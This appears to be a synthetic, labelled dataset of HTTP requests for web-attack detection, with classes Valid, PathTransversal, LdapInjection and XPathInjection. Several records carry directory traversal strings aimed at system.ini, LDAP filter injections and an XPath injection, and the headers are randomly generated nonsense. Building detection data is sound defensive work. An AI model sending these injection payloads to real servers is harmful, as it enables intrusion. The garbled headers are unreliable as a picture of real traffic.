If-None-Match: "n8sVtAMEnf.emWBijb@8"
If-Range: "2tjHLPMPi3HFVrJ@e"
Max-Forwards: 2849
MIME-Version: 7.4
Pragma: khrphy=rhnf4t
Proxy-Authorization: Digest nonce
Authorization: Digest algorithm=MD5
Range: 135480-
Referer: http://www.uerO.fr/uiet9o/ptIj0e/u0sirieM/taeis.css
TE: trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 3.3; eh-N9; rv:2.6.5) Gecko/63094239
UA-CPU: x86
UA-Disp: 8394,8208,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 9481x739
Via: 9.7 www.9eeoyWm.html:8148, HTTP/3.4 97.235.250.181
Transfer-Encoding: deflate
Upgrade: ropcwa/9.2
Warning: 451 151.219.53.5 "ns05" 
X-Forwarded-For: 217.19.212.140
X-Serial-Number: 58041011028
----: --------------------
~~~~~: ~~~~~~~~~~~~~~

91rmOaufese=em4&ehonmere=7964744&ie3e=dCw&lnirdrbPvheheor=12

End - Id: 6499
Start - Id: 32826
class: Valid
POST /op59LcC7@ZESwRgvY/auibckcrtsezhocd.nsf? HTTP/1.0
Content-Length: 261
Content-Language: rtcf4ieg
Content-Encoding: identity
Content-Location: /tAelrhD3/clssytao/4neEht.asp
Content-MD5: aWhobXRlcmh0aGkyaHFpOA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 18 Jan 09 24:45:54 GMT
Last-Modified: Sun, 03 Apr 05 16:38:25 GMT
Host: www.7thewrs7.st
Connection: s14ei
Accept: text/html
Accept-Charset: big5
Accept-Encoding: identity, compress, deflate;q=0.2
Accept-Language: On-Tru, uNil-bcd, us3es-xat;q=0.3, 66eqho-3ecngaxd
Cache-Control: only-if-cached
Client-ip: 175.178.160.0
Cookie: s7atf4shs=85654550;ic3v6ahbhgwd=9cfghdrblorcoddfau
Cookie2: $Version="657"
Date: Mon, 01 Mar 10 05:47:53 GMT
ETag: W/"21a5JVWYw99hUUZSgNhE"
Expect: rdlslz=jdHI;ep23s4a=epna0to
From: hqso@atPmE.de
If-Modified-Since: Wed, 14 Jan 09 06:40:19 GMT
If-Unmodified-Since: Mon, 09 Aug 04 05:15:50 CET
If-Match: "x.TiWZNdfWg5jfmm"
If-None-Match: "nnLr-mo5Qrb5eRzDo"
If-Range: Wed, 31 May 06 08:35:47 UTC
Max-Forwards: 1
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1e5et aieatut=rah4tea
Authorization: NTLM cmRzYXRqb3R5ZmVhdGU5YWRyZkM1aWRyZWFUbWhhd2FSRTYyOWRpdA==
Range: 994-,-5425
Referer: http://www.eioh.be/gns6i/ps9ny/nyDsr9s/sil96f.wav
TE: gzip,trailers
Trailer: Trailer
User-Agent: oSNwBEr.u http://www.e7uma.biz
UA-CPU: x86
UA-Disp: 6288,1100,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 1238x1114
Via: FTP/4.1 www.2trme.jpg:73
Transfer-Encoding: gzip
Upgrade: a1gnfr/1.8, dT1/0.1
Warning: 175 www.sl7Ocpt.jpg:342 "0uw6Ne" "Fri, 08 Feb 08 18:17:21 CET"
X-Forwarded-For: 149.185.179.218
X-Serial-Number: 6352677
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nrEntp7HgeiHaek=/fht&InGwNg=649181&heckmnb=eDw3l64&hnnbnni=positionae]wo3objecte+ard?&KnWdl5VG6d2c=ejKGmDTP&Aopevlyeso=1522&szezihyae4ee2ts=ireIeesethla&xterm8H9hKdY=77&3Whprocessing-instructionvLa=iaI~t$hde)&a63wehuhzt2fw=899&slzdeholaotta=032207

End - Id: 32826
Start - Id: 6429
class: Valid
POST /4En1s/fJqWHmhLH/ciuvI@059me/tfaS1urt1SxtteSx/JJhtacces8JQ/aehGsHhgNi/nYkSLbW63q/c4sGu/mr8xp_@ptI43IINT/emJ3gMT3ktsUxA8EcQp.pl? HTTP/1.1
Content-Length: 38
Content-Language: iya,e9j6
Content-Encoding: identity
Content-Location: http://ablisps.fr/ettxer/esmz/gtphea/c2awlets.css
Content-MD5: TW9vY1kxdGFRaHRoaTZuRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Sep 04 24:14:35 GMT
Last-Modified: Wed, 21 Dec 05 18:30:41 UTC
Host: www.caTiblr.ch
Connection: deenstsn
Accept: */*
Accept-Charset: x-mac-roman, windows-1250;q=0.4, iso-2022-kr;q=0.2
Accept-Encoding: deflate;q=0.9
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 148.171.92.171
Cookie: swtelsTite=ehe6gvwontAEh;cbaaihagdteie=95396627;vservices797_nLxp_8G=slbt
Cookie2: $Version="622"
Date: Sat, 19 Feb 05 24:05:32 GMT
ETag: W/"8juqnNuXkQUePH9hYC7"
Expect: navl=esus;1b2ni=eqtheF
From: 5onfgr@tttceuz.gov
If-Modified-Since: Sat, 27 Aug 05 20:33:08 GMT
If-Unmodified-Since: Thu, 12 Apr 07 09:20:42 GMT
If-Match: "CtJbETmlulv@U4w1BG"
If-None-Match: "ScUV_Fm6AsZORy7txw"
If-Range: "vKeRgTSLrlLFB8a8m"
Max-Forwards: 7
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: NTLM Y0FkaGNkZWV1YzN2YWx0ZWp0cHNsR2xPYVlhQTY2c3dlcGhhblJ0Z2tzZ2lhY2E=
Authorization: Digest qop=auth
Range: 60-,871981-,7-42952
Referer: http://i5hdn.st/lrsta0sv/dae6/nrii7ys/ernqem/ruolsZe.rar
TE: chunked;q=0.5,gzip
Trailer: Via
User-Agent: 0cabggnku (8goVbH; ob7az8USh; swDtI9qWwB; o-fUFy; e1XW78NL2G)
UA-CPU: 68000
UA-Disp: 0332,310,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8174x6805
Via: HTTP/0.5 151.61.133.62:0
Transfer-Encoding: gzip
Upgrade: eosNY/6.2, etmS/7.5
Warning: 834 www.myeibl.html "tfAmnsglsree" 
X-Forwarded-For: 3.49.116.125
X-Serial-Number: 45754151629
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

othr5renesschtd=89549681&OAsaseg=i$9

End - Id: 6429
Start - Id: 45839
class: PathTransversal
GET /.sO@3/eoo9RmiBmldmsgtn/s_IT6YHh39/yet2esIst/Ojal4nt/h2Enu8itlEatljt/amI/io.jsp?sleO=wrhmb6sstYYfmo&tet=style&zqenemwnmjaht0p=leTaieezosinnrrrw&yantdreheb=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.1
Host: www.rssp.com:80
Connection: keep-alive
Accept: text/*, text/*, application/*;q=0.6
Accept-Charset: *
Accept-Encoding: compress, identity, identity;q=0.3
Accept-Language: yttlw7-zfretd5o, e-abiy, Ebex-u37ac;q=0.7, vsa-De
Cache-Control: no-transform
Client-ip: 182.82.168.28
Cookie: Vgtmptpwety=enyiEAx2fe;meseLbhlrF1g=02106;aPax= ezea'lEc&a$e
Cookie2: $Version="84"
Date: Mon, 25 Aug 08 19:24:26 GMT
ETag: "pcuOXffDgOU2k3R9Y"
Expect: crmd2me
From: ix4abcph@mnt9ssu.gov
If-Modified-Since: Sun, 06 Aug 06 08:42:43 UTC
If-Unmodified-Since: Thu, 15 Sep 05 05:10:13 UTC
If-Match: *
If-None-Match: "zXW-D.D90nzMt8qQ"
If-Range: *
Max-Forwards: 768
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: Digest uri=http://www.ncrl8sh.ch/2nled.asp
Authorization: Basic b3llM2loamk6dGUzb3Rhcw==
Range: 321-0
Referer: http://6wnbxsto.org/aacIee/ssoDrsb/2h15i/ngere/ahafknf.txt
TE: gzip;q=0.3
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.0 (compatible; EanhT; Mac OS X; oHlEhohuiH; en0mamtuwH; babesaea)
UA-CPU: Sparc
UA-Disp: 7854,570,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 861x425
Via: 9.8 245.231.3.126, 7.5 www.asb3t.jpg:55428
Transfer-Encoding: ts0lte
Upgrade: idie/5.7, dunk/6.1, sib/2.4
Warning: 146 143.244.193.232 "tjezxosaoyuieeityv" 
X-Serial-Number: 25397478987579
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45839
Start - Id: 45260
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.ytdueepduo.gov
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=44
Client-ip: 197.120.255.144
Cookie: ex=9lqeiwp-mNTi4Ho9;iikuqtfe=ntt;ksTb0ntgiw6=93208789
Cookie2: $Version="36"
Date: Thu, 23 Aug 07 19:39:45 CET
ETag: W/"ba2N-LW3dBH.hNtm3T"
Expect: 100-continue
From: geleR@t0uaaRegG.gov
If-Modified-Since: Sat, 31 Oct 09 09:10:58 GMT
If-Unmodified-Since: Thu, 25 Oct 07 22:02:20 UTC
If-Match: "uj_ovQk5au_1.EvgGTS"
If-None-Match: *
If-Range: Sun, 08 May 05 20:41:13 UTC
Max-Forwards: 363
MIME-Version: 1.7
Pragma: talghohn=geah
Proxy-Authorization: Digest qop=evai40
Authorization: Digest username="veno"
Range: -249,23568-43
Referer: /tHshTemr/y9nijw/oSHeteT/rnnD1u9.asp
TE: chunked
Trailer: Host
User-Agent: lsMarso6rn (ihs2LkFn.; pfk-dE.; aJ85XyH7i@)
UA-CPU: 68000
UA-Disp: 783,7858,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2272x045
Via: Ertrss/2.6 www.gthu.js:75962, 6.0 www.cdu2ird.shtml, HTTP/9.6 www.Ntt0teT.tiff
Transfer-Encoding: identity
Upgrade: t7aRna/4.0
Warning: 924 www.Tmlirlsa.shtml "t5eakntztrsthoinaeue" 
X-Forwarded-For: 95.222.138.243
X-Serial-Number: 67855229
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45260
Start - Id: 15602
class: Valid
GET /fn4nez5e9r/cvbscriptL4uH4CB/yni34Ire/1XsFkwehmuWL0emW/dZwA5zrzperly/NwHsi@.mdb?uauCjTS1lMlasrt=mp%40&e5sL=tpnUnie4d&eraeelsktts=o4lilYrEGfd&hae2aonohadat=orkg&cnHcnnr=5&vouysoeiheo=uiYoo&mSI9NDn=2rt%404H-S&btoaHetlindby=dSh&c7oAs=97&v-usrXpasswdXiinj=to7sImt&enkl71Anstse=eIaz2gvteang&eeu1ulrc=n7oimge%3B%25ulocationurEe HTTP/1.0
Host: www.hhodps.be
Connection: eiSnS
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 229.143.229.81
Cookie: inwH7efr=jeo%E
Cookie2: $Version="758"
Date: Mon, 02 Aug 04 05:53:09 UTC
ETag: "h2ZBzGpTvy6VeGBY6A99"
Expect: e74nE
From: egyhr8@dp3Tsste.uk
If-Modified-Since: Tue, 26 Jan 10 23:38:24 UTC
If-Unmodified-Since: Tue, 08 Jan 08 19:47:52 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 12 Oct 04 06:03:11 GMT
Max-Forwards: 099
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: vrynOe rp7b=4e4ltho
Authorization: psltiV egca8zen=tdad
Range: 713-,63505-263305,-5
Referer: http://www.aoa5.fr/ro9srplj.tar
TE: gzip;q=0.4,trailers,gzip;q=0.0
Trailer: Accept-Charset
User-Agent: Mozilla/6.5 (compatible; MSIE 1.2; SunOS sun4u; r5vl)
UA-CPU: x86
UA-Disp: 6997,2837,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 817x4367
Via: FTP/5.9 www.nwicE.htm
Transfer-Encoding: gzip
Upgrade: entx/9.4, 8ssiss/6.7
Warning: 737 123.135.15.139 "27acrahrs" 
X-Forwarded-For: 86.193.245.82
X-Serial-Number: 42056284732310990
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 15602
Start - Id: 38404
class: LdapInjection
GET /ooDP4Oz3ukRQUu5/0rhhptkotofCa/e@xWz9Lk/rxw5gpprencuem/oqW5lHs_dL_9u4EtGXgj/dnMEVfN/twbumstComl/inoIrqEdeteh7l/Saclahhe/tsthfr2e.asmx?yi=5674&tV7h=oenh&ht4=n1otxguzovaontli&6o8WwpositionZhO7=3o%29%28%26%28objectClass++++%3D++s9b*%29&lsnvnwTdd=9725&dwaifbrayca=s7%2BIwnD4mblws&alhnoeTpods=i&eSe=usm08a HTTP/1.0
Host: 12.156.224.16
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: x-mac-korean;q=0.1, gb2312, cp-932, euc-jp
Accept-Encoding: *;q=0.4
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 214.154.43.120
Cookie: tcfeis47d=noeiG;9eto0=Renbc9;rrmOcedkautD8=me9awls;gMobject5oXR0HR=Oro;autEtaHtynnM2oe=edFz9ahndnem5h;B0wh2kscywttdc=eeb
Cookie2: $Version="47"
Date: Fri, 13 May 05 12:56:21 CET
ETag: W/"LGlAcUQZD9g6TgV2"
Expect: 100-continue
From: eife7@tfrg4tnjm.cz
If-Modified-Since: Fri, 27 Feb 04 13:49:22 CET
If-Unmodified-Since: Wed, 23 Aug 06 10:43:44 CET
If-Match: *
If-None-Match: "MYcPA9YU0h1iquSRf"
If-Range: Mon, 10 Jan 05 24:27:15 UTC
Max-Forwards: 174
MIME-Version: 0.1
Pragma: oew3ac=hl
Proxy-Authorization: Basic Z25peXFzaDpld3NkcnA=
Authorization: Digest opaque="uhen"
Range: -96373
Referer: /rteaa.aspx
TE: gzip;q=0.0,deflate;q=0.5
Trailer: From
User-Agent: dta9R (bT_.TJ4d4c)
UA-CPU: Sparc
UA-Disp: 2631,041,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 7262x7113
Via: FTP/0.0 196.51.159.170, t5ode/5.4 www.aIeotEm.jpeg
Transfer-Encoding: deflate
Upgrade: rlwdd/8.0, wre/1.9, b3o/6.7
Warning: 267 www.otmR1ir.htm "emnzR" "Mon, 09 Jun 08 08:56:30 UTC"
X-Forwarded-For: 139.160.46.245
X-Serial-Number: 8565701730547644653
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38404
Start - Id: 20071
class: Valid
GET /otCtnitimuaaan/becmla8Td1Ile/eogaYrKQ/xaIMx_pvLLzTAoun/hSIcrFie1F2DojNPd/sdoEc8at0duiee/nZh4/hwfdtslstre6aa/g4edtha6ESnc4tfo/hSRFl.AH/ezLoxqIxSt.dll?rjnaJe=dbAju HTTP/1.0
Host: 194.30.248.116
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: timZoa-re, s-fodoou;q=0.7, yaiubo-cofawN3f
Cache-Control: no-transform
Client-ip: 121.232.32.130
Cookie: 1uc=hb1h;htnhhnebq=i8JJp@OvFy;UsIsr=767295;CxG0c9qn.D=reot;RcRl=velsddaotbfie
Cookie2: $Version="09"
Date: Mon, 16 Mar 09 01:46:21 CET
ETag: "3Rkugc0BF15ZHyL@Zdo"
Expect: 100-continue
From: lnAp2pl@vGteni.biz
If-Modified-Since: Wed, 25 Jul 07 01:03:54 CET
If-Unmodified-Since: Wed, 18 May 05 02:48:10 GMT
If-Match: "OuMr6CeP9VRnNT4n"
If-None-Match: "di@4q@NkQKvQR5MDPkD"
If-Range: Sun, 30 Oct 05 22:20:28 GMT
Max-Forwards: 2032
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic eWZ0dDphZ3VkZ29F
Range: -09642
Referer: /kcxeoetG/iit6o0rc/utfoun/7flea/aecas.mdb
TE: trailers,gzip
Trailer: Date
User-Agent: Mozilla/9.1 (Windows; U; Win98 8.0; ot-wa; rv:2.6.2) Gecko/81900874
UA-CPU: MIPS
UA-Disp: 894,918,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 1108x908
Via: 0.0 76.111.166.122, HTTP/9.3 www.adhvdsq.tiff, HTTP/2.6 www.rlpaV.gif
Transfer-Encoding: deflate
Upgrade: edl/6.4, oivt/9.3, uhe/8.8, vst/2.0
Warning: 538 147.53.166.140 "xttnfadtizmh0a" "Tue, 02 Aug 05 13:31:53 GMT"
X-Forwarded-For: 51.235.225.48
X-Serial-Number: 9909201039312
----: --------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 20071
Start - Id: 20603
class: Valid
GET /ljDHQdGgQT/t8jatcn/6xZ/pXo9lm0gVMqI40/UVusrOfVAel1UandeHY/adpsuwEtfdrtei/guqm/euei/0rfapbtkA.mspx?tx=ygaInusrow&FhXH=Gexecexwm8d+dropiefe&wjIvdmim=u%2F%3CaesEna+exectsmocham&pratnpf=noFeTZHo0&da8eeo=0963732&2iilg1=rea+u&wl=saddacaPMeflae&pdf4nbol9unmii=r8documents&adflr=05574507&4LGd@Ejwindow.opengchildS=am1oi&SKO6K=Esys9&ocanreeeE=wtn2nute&yEht=ulhet%3DtL%27po+7oi HTTP/1.0
Host: 91.232.31.31
Connection: ebEes
Accept: text/plain, text/plain;q=0.6, application/rtf
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 85.31.157.53
Cookie: etxw=m6;Ar4i=ful1ht;iesnucsiro3=arht;ai=4840;ag=oopl
Cookie2: $Version="86"
Date: Sat, 19 Jan 08 02:13:17 UTC
ETag: "AE0417QjoIDKTzg.9"
Expect: rhrtsE=arrld
From: ts5bme9@rv7as.net
If-Modified-Since: Sun, 04 Sep 05 22:30:02 GMT
If-Unmodified-Since: Mon, 02 Jun 08 23:18:17 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 76
MIME-Version: 2.5
Pragma: teei=rtdjd
Proxy-Authorization: Digest username="weion"
Authorization: Digest nc=8fdc480b
Range: 8188-
Referer: http://www.fogNyh.be/epsmeaa/annfz/eeen/nsnEia/et0dxi.pl
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: egptTtnosusatt
UA-CPU: StrongARM
UA-Disp: 6133,0939,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 9357x868
Via: HTTP/5.1 www.iugnsl.shtml, HTTP/4.9 223.216.141.177, 6.8 46.47.171.97
Transfer-Encoding: gzip
Upgrade: eslgr/3.9, atMiHe/6.8, nTh/6.8, osoe/5.2, mniXaq/1.3
Warning: 084 210.63.166.92 "n84wtnheemlbttgaae7a" "Thu, 01 Jun 06 05:43:47 UTC"
X-Forwarded-For: 16.249.84.121
X-Serial-Number: 999844116491308
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20603
Start - Id: 10806
class: Valid
GET /gb2D9HBj6SC8t/go8enexonEdM/af4dweigtahh5ttk/mgiO.jsp?eni8trr=3&q0SRitsHsexywte=62950&shls7fdtroo=584654&EErt20a=8qIPP HTTP/1.1
Host: 72.79.237.44:4040
Connection: keep-alive
Accept: text/plain;q=0.8, text/*, image/png
Accept-Charset: x-mac-turkish;q=0.5, utf-8;q=0.5, x-mac-japanese;q=0.5, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: max-age=1
Client-ip: 195.254.67.11
Cookie: jteT=uca14fSRD
Cookie2: $Version="6"
Date: Sat, 25 Feb 06 07:10:33 GMT
ETag: "sCnS6DDl9kuZb-fBjz"
Expect: edeosGeb
From: eatiedI@0aabliaA.fr
If-Modified-Since: Tue, 31 Aug 04 01:05:21 CET
If-Unmodified-Since: Sat, 05 Jan 08 11:20:15 GMT
If-Match: *
If-None-Match: "GiH.mpccJRqz_dMUYh"
If-Range: Sat, 09 Jan 10 14:39:27 CET
Max-Forwards: 6
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic bjZsYWF5NmI6ZWlqN3Nl
Range: -605203
Referer: http://www.owslp3.ch/creeigvw/1efrno/eBowtdce/Eiausrtm.html
TE: deflate;q=0.3,deflate;q=0.9
Trailer: Referer
User-Agent: Mozilla/8.1 (Windows; U; Win 9x 2.1; en-og; rv:7.5.7) Gecko/83411896
UA-CPU: 68000
UA-Disp: 4468,6865,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4636x443
Via: 4.6 238.180.144.45, 7.8 225.8.237.62:77745
Transfer-Encoding: gzip
Upgrade: dfeo/3.1, 4aehpf/3.9
Warning: 951 140.118.229.134 "esuyiiii5XtSsn4ie8" 
X-Forwarded-For: 44.92.107.214
X-Serial-Number: 026884237453850145
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10806
Start - Id: 5369
class: Valid
PUT /tO4SrHfLbx@NwW/eU9/fwnerbeAcwGotir/uzepupeeemtsyRiRo/lw_GK/bpVAHVYrMiko-gI6Y/V.AS7Z/-3echohYS6Yid/eq-n/htRotjyTW2/rigp3Scsf/0JPRer9G@YN.pl? HTTP/1.0
Content-Length: 17
Content-Language: r1Okwi
Content-Encoding: deflate
Content-Location: /thse/6uteNRi0.dll
Content-MD5: YW9lSHJ0c3RoaWRoaHRlTQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 18 Jul 09 15:27:25 CET
Last-Modified: Tue, 09 May 06 15:34:31 CET
Host: 97.15.224.134:2
Connection: keep-alive
Accept: application/rtf, text/plain
Accept-Charset: x-mac-korean, gb2312, x-mac-chinesetrad
Accept-Encoding: *;q=0.1
Accept-Language: c4Eo-dnsonlez;q=0.2, jwNjE-N7e;q=0.2, kyoyas-eaeetiix;q=0.3, Axueulf-o4;q=0.0
Cache-Control: max-age=87
Client-ip: 76.136.239.56
Cookie: sh5IeQteZtut=mio3ai;ageht0edaDeudhr=362082830;143oeqU1she4tcs=epWS
Cookie2: $Version="919"
Date: Thu, 30 Mar 06 11:30:52 GMT
ETag: W/"y0iigZ7qsxXZ6cna0"
Expect: 100-continue
From: rdbt@eordwt.ch
If-Modified-Since: Mon, 17 Apr 06 22:27:42 CET
If-Unmodified-Since: Wed, 11 Aug 04 03:00:39 UTC
If-Match: *
If-None-Match: "1CxokObIcapl1Va"
If-Range: "Wq2Zu@-Q4gvpG@BwZQj"
Max-Forwards: 6106
MIME-Version: 9.7
Pragma: EiarYk=h
Proxy-Authorization: Digest response="fd8dEEba5EdDB19dA6Bc0aEFEF4BbD26"
Authorization: Basic YzB6aGVveDphaGR0b24=
Range: 429-04732,0-0702,6-47430
Referer: http://tlyte.be/ekOl/Bi7dpe6/seee/dhnsidet/cc37oe.jpg
TE: deflate,gzip;q=0.8,trailers
Trailer: Pragma
User-Agent: aeeei3n (aw70czqN; a8nS3o)
UA-CPU: x86
UA-Disp: 904,156,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 3820x055
Via: HTTP/8.2 www.ceoy.js:13364, HTTP/3.3 www.obnhi.html, exer/5.1 www.rs1qaT.jpg
Transfer-Encoding: compress
Upgrade: m4rr/9.8, leutb/5.3, pbd/7.7
Warning: 111 www.ryaeFet.css "w2rhtt" 
X-Forwarded-For: 195.76.247.208
X-Serial-Number: 028740747069773
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

oivN=rll&Zeyw-=ep

End - Id: 5369
Start - Id: 49857
class: XPathInjection
GET /e-Omnc7l8ba/81LSffLygsFo6u/olBZ@A_QqYKifh-922./nmou6/rrbteRa.mspx?is2ISOaneowaea=hpasswdj%3Cee%3Div+oNtsa%3Cit3&vh8p=eiibe8o&waadloow2=52t8y3fm&@QZ1gHIh=xtermn%3Fpi7vcppsameaa%7C%40&cn=44853600&Gkoa=yeoptaas8ir1&xrrsm7e=zti%26&IMSxacceptLkI=oonns&GTtL=41351391&4coservicesnFQNon-ftp=egd%27+++or+++++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++++or+++++%27l8%27+%3D++%27&bkupildDh=bet&bs8do=569&tmr=895vbCN0sam HTTP/1.0
Host: 129.101.46.132:80
Connection: close
Accept: image/*;q=0.8
Accept-Charset: iso-10646-ucs-2, euc-kr, windows-874
Accept-Encoding: *;q=0.6
Accept-Language: *
Cache-Control: min-fresh=0201
Client-ip: 145.65.227.178
Cookie: hTet5=Lnetcat
Cookie2: $Version="51"
Date: Sun, 03 Oct 04 19:41:55 UTC
ETag: "fkNhvCS9mNXdCe20Q7UR"
Expect: 100-continue
From: oyrua@eNee.com
If-Modified-Since: Sun, 11 Apr 10 15:14:32 GMT
If-Unmodified-Since: Thu, 24 Mar 05 18:56:24 UTC
If-Match: "oR8nchPj3NMT-Mwd3ik"
If-None-Match: "3qr4bQbvXafF6Xiy"
If-Range: Thu, 20 Sep 07 11:58:31 CET
Max-Forwards: 390
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic bGFydHZyOGM6OFNvbGNldA==
Authorization: xlE0 aelJ=NEonemxl
Range: 451065-8,-1181,-282
Referer: http://www.gtpAttls.cz/mrre0e8.aspx
TE: gzip
Trailer: Pragma
User-Agent: Eiinat6r/1.2
UA-CPU: 68000
UA-Disp: 020,0020,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 967x245
Via: 9.1 62.8.231.97
Transfer-Encoding: identity
Upgrade: soar/0.1
Warning: 988 26.40.140.189 "waoenT" 
X-Forwarded-For: 246.212.130.181
X-Serial-Number: 5095784293385
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49857
Start - Id: 38463
class: LdapInjection
GET /oTynylt0sxonh/oc-9-E7yK/CtFfVcVMr-replaceWG/Dbzni-MW5/atAdxTlie/huhtpeStyaews.swf?etlemneehd7sf=9204%29%28%26%28objectClass%3DErt6%29%28%7C%28sn++%3D++++euhl%29%28cn%3Dth++J*%29%29&r9ynawtwqFe=sakdshng&etemlppomecos=t9b HTTP/1.1
Host: 5.178.44.222
Connection: close
Accept: video/*
Accept-Charset: iso-8859-5;q=0.9, windows-1251;q=0.1, iso-8859-8-i
Accept-Encoding: compress;q=0.1, compress, identity, deflate
Accept-Language: fwlI4-sreiaST;q=0.5, edn5a-plid, ot-5t7Tytoh
Cache-Control: max-stale
Client-ip: 180.75.19.86
Cookie: hmhoeaznnwgso=5429;osAtggxhshee2t=onmjfarumxudo;Etqe=9;ifxt=re;my=19021;pbaeeeuwEeBotl=r7A6aAtzgGM
Cookie2: $Version="35"
Date: Mon, 09 Feb 09 23:08:26 CET
ETag: "dAKakF.oYxCdLRoI.Z"
Expect: betmtr=nyjiso;hCgrf6g
From: tyfttbup@ihotaatFt.uk
If-Modified-Since: Sat, 23 Dec 06 24:50:10 GMT
If-Unmodified-Since: Thu, 16 Jun 05 07:24:08 CET
If-Match: "jOuYQtaOS4IwqAs"
If-None-Match: *
If-Range: Fri, 05 Jun 09 09:18:42 UTC
Max-Forwards: 5578
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: iiEb vcnyig9=nalmt
Authorization: Basic ODVuc25naGw6bmF4dG1p
Range: 24-,76759-,-19589
Referer: http://www.oRne.net/6nen/eyzne/ehiee/ltnei.asmx
TE: trailers
Trailer: If-Match
User-Agent: Rya7an (git-4a)
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 632x125
Via: 5.0 www.eilhyt.js:22, 9.7 202.26.190.36
Transfer-Encoding: deflate
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 346 www.tt8o.css "ptUwt" "Mon, 17 Mar 08 22:41:42 GMT"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38463
Start - Id: 45195
class: PathTransversal
GET /../../? HTTP/1.1
Host: www.esDlsOt.fr
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: euc-jp, iso-8859-1
Accept-Encoding: deflate;q=0.4, gzip;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 145.145.12.214
Cookie: fcmNRns=9;yrohs3aol=863346;eeuuettlrptdv7=ifqopnmd2haFtna
Cookie2: $Version="58"
Date: Wed, 08 Apr 09 19:23:24 GMT
ETag: W/"5P7OUM98bOhr6Jn"
Expect: oq0ewer7
From: 6gdote@rgqihciehi.be
If-Modified-Since: Tue, 21 Jun 05 09:31:28 GMT
If-Unmodified-Since: Sat, 13 Jan 07 15:55:46 GMT
If-Match: "cjjCV@@Knz4SS56Rr"
If-None-Match: *
If-Range: Sat, 30 Jul 05 12:00:22 CET
Max-Forwards: 8111
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: Digest nc=8b2D49ef
Range: 338-,-31040,26925-
Referer: /e1po/ui6ysuO/taet.jsp
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: Mozilla/5.4 (X11; U; Linux i586 0.5; i9-Ip; rv:2.4.9) Gecko/58176689
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: HTTP/4.1 www.udmdh.png, 4.5 117.21.158.129
Transfer-Encoding: compress
Upgrade: eimdea/6.6
